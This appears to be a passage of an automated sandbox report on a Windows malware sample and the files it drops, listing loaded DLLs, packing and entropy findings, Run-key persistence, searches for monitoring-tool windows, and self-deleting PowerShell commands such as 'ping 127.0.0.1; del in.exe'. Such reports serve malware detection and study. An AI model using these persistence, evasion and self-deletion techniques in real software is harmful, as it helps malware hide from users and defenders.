                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: windowscodecs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: dlnashext.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: wpdshext.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                          Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: file.exeStatic file information: File size 2992640 > 1048576
                          Source: file.exeStatic PE information: Raw size of qavlzoyx is bigger than: 0x100000 < 0x2a9000

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.50000.0.unpack :EW;.rsrc:W;.idata :W;qavlzoyx:EW;ixfbxqpd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qavlzoyx:EW;ixfbxqpd:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeUnpacked PE file: 46.2.db77c3e215.exe.130000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW;
                          Suspicious powershell command line found
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006A66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,10_2_006A66A8
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[1].exe1.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: random[2].exe0.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                          Source: 3f5e6ed253.exe.5.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                          Source: 7z.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                          Source: 3dd71a48b2.exe.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                          Source: 7z.dll.6.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                          Source: 4fa7efe79d.exe.5.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                          Source: random[1].exe2.5.drStatic PE information: real checksum: 0xd9d82 should be: 0xdfd9a
                          Source: in.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: random[2].exe1.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                          Source: adcf1df75f.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                          Source: file.exeStatic PE information: real checksum: 0x2dd915 should be: 0x2e8d52
                          Source: ea2827841c.exe.5.drStatic PE information: real checksum: 0x4411c2 should be: 0x44bea1
                          Source: Intel_PTT_EK_Recertification.exe.19.drStatic PE information: real checksum: 0x0 should be: 0x1c320c
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x2dd915 should be: 0x2e8d52
                          Source: random[1].exe0.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                          Source: random[2].exe.5.drStatic PE information: real checksum: 0x4411c2 should be: 0x44bea1
                          Source: db77c3e215.exe.5.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: qavlzoyx
                          Source: file.exeStatic PE information: section name: ixfbxqpd
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: qavlzoyx
                          Source: skotes.exe.0.drStatic PE information: section name: ixfbxqpd
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.5.drStatic PE information: section name:
                          Source: random[1].exe0.5.drStatic PE information: section name: .idata
                          Source: random[1].exe0.5.drStatic PE information: section name:
                          Source: random[1].exe0.5.drStatic PE information: section name: lzigcvvj
                          Source: random[1].exe0.5.drStatic PE information: section name: pdsqmwos
                          Source: random[1].exe0.5.drStatic PE information: section name: .taggant
                          Source: db77c3e215.exe.5.drStatic PE information: section name:
                          Source: db77c3e215.exe.5.drStatic PE information: section name: .idata
                          Source: db77c3e215.exe.5.drStatic PE information: section name:
                          Source: db77c3e215.exe.5.drStatic PE information: section name: lzigcvvj
                          Source: db77c3e215.exe.5.drStatic PE information: section name: pdsqmwos
                          Source: db77c3e215.exe.5.drStatic PE information: section name: .taggant
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: bpttswmy
                          Source: random[2].exe.5.drStatic PE information: section name: dlztltgc
                          Source: random[2].exe.5.drStatic PE information: section name: .taggant
                          Source: ea2827841c.exe.5.drStatic PE information: section name:
                          Source: ea2827841c.exe.5.drStatic PE information: section name: .idata
                          Source: ea2827841c.exe.5.drStatic PE information: section name:
                          Source: ea2827841c.exe.5.drStatic PE information: section name: bpttswmy
                          Source: ea2827841c.exe.5.drStatic PE information: section name: dlztltgc
                          Source: ea2827841c.exe.5.drStatic PE information: section name: .taggant
                          Source: random[2].exe0.5.drStatic PE information: section name: .eh_fram
                          Source: 3f5e6ed253.exe.5.drStatic PE information: section name: .eh_fram
                          Source: in.exe.17.drStatic PE information: section name: UPX2
                          Source: Intel_PTT_EK_Recertification.exe.19.drStatic PE information: section name: UPX2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0006D91C push ecx; ret 0_2_0006D92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00061359 push es; ret 0_2_0006135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FAD91C push ecx; ret 2_2_00FAD92F
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0068676A push rcx; ret 10_2_0068676B
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000702D8 push cs; retn 0006h44_2_00070318
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00040DE6 push ecx; ret 44_2_00040DF9
                          Source: file.exeStatic PE information: section name: entropy: 7.987371951663944
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.987371951663944
                          Source: random[1].exe0.5.drStatic PE information: section name: entropy: 7.979706188474013
                          Source: random[1].exe0.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                          Source: db77c3e215.exe.5.drStatic PE information: section name: entropy: 7.979706188474013
                          Source: db77c3e215.exe.5.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                          Source: random[2].exe.5.drStatic PE information: section name: bpttswmy entropy: 7.956242440567348
                          Source: ea2827841c.exe.5.drStatic PE information: section name: bpttswmy entropy: 7.956242440567348
                          Source: random[2].exe1.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                          Source: adcf1df75f.exe.5.drStatic PE information: section name: .text entropy: 7.73440914387992
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1
                          Source: initial sampleStatic PE information: section name: UPX0
                          Source: initial sampleStatic PE information: section name: UPX1

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files with a suspicious file extension
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                          Uses cmd line tools excessively to alter registry or file data
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file

                          Boot Survival

                          barindex
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adcff63ffe.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1742fccc73.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c48ca243d4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7278b2c5ac.exeJump to behavior
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
